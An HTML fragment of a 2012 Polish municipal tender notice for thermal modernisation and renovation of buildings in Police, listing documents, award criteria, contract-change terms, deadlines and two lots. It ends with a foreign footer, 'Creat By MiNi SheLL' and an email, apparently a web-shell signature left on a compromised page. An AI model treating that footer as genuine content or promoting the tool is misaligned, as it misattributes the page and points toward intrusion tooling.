<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dowód wniesienia wadium (na 1 lub 2 zadania).

2.	Formularz oferty - zgodnie z otrzymanym wzorem - zał. nr 5a,b wraz z załączonym kosztorysem ofertowym, z którego wynika cena oferty.


14.	Oferowane warunki gwarancji i serwisu gwarancyjnego - wg zał. nr 10.

15.	Prezentacja oferowanej technologii (aprobaty, foldery producentów, opis oferowanych do wbudowania materiałów i wyrobów).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art. 144 ust. 1 ustawy PZP Zamawiający przewiduje możliwość wprowadzenia zmian postanowień umowy zawartej w wyniku rozstrzygnięcia postępowania, gdy zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z  SIWZ, a w szczególności:
a)	zmiana terminu realizacji przedmiotowego zamówienia w przypadku  działania siły wyższej, uniemożliwiającego wykonanie robót w określonym pierwotnie terminie , 
b)	realizacji w drodze odrębnej umowy prac powiązanych  z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, prac lub badań  konserwatorskich lub innych niezbędnych, powodujących konieczność wstrzymania robót objętych niniejszą umową .	

Wszelkie zmiany umowy mogą nastąpić wyłącznie w formie pisemnego aneksu podpisanego przez obydwie strony - pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.police.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siwz w wersji elektronicznej można uzyskać na stronie internetowej, w wersji drukowanej można otrzymać w Wydz.Gospodarki Komunalnej i Mieszkaniowej Urzędu Miejskiego w Policach, ul.Bankowa 18, pok.202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 09:00, miejsce: Zamkniętą kopertę zawierającą ofertę należy złożyć w sekretariacie (pok. nr 30) Urzędu Miejskiego w Policach przy ul. Stefana Batorego 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie realizowane jest w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013. Tytuł projektu:  Renowacja części wspólnych wielorodzinnych budynków mieszkalnych w obszarze Stare Miasto w ramach rewitalizacji miasta Police.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja budynku użytkowego w Policach, ul. M. Konopnickiej 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ocieplenie ścian zewnętrznych budynku, kolorystyka elewacji budynku, wymiana stolarki okiennej i drzwiowej wraz z robotami budowlanymi towarzyszącymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.32.00.00-6, 45.43.10.00-7, 45.42.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termomodernizacja budynku, wymiana instalacji elektrycznej i remont klatki schodowej w Policach, ul. T. Kościuszki 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	ocieplenie ścian zewnętrznych budynku, kolorystyka elewacji budynku, wymiana stolarki okiennej i drzwiowej wraz z robotami budowlanymi towarzyszącymi,
b)	wymiana instalacji elektrycznej w częściach wspólnych budynku,
c)	remont klatki schodowej, wejścia, konstrukcji zewnętrznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.32.00.00-6, 45.43.10.00-7, 45.42.10.00-4, 45.26.21.20-8, 45.11.12.20-6, 45.44.21.00-8, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com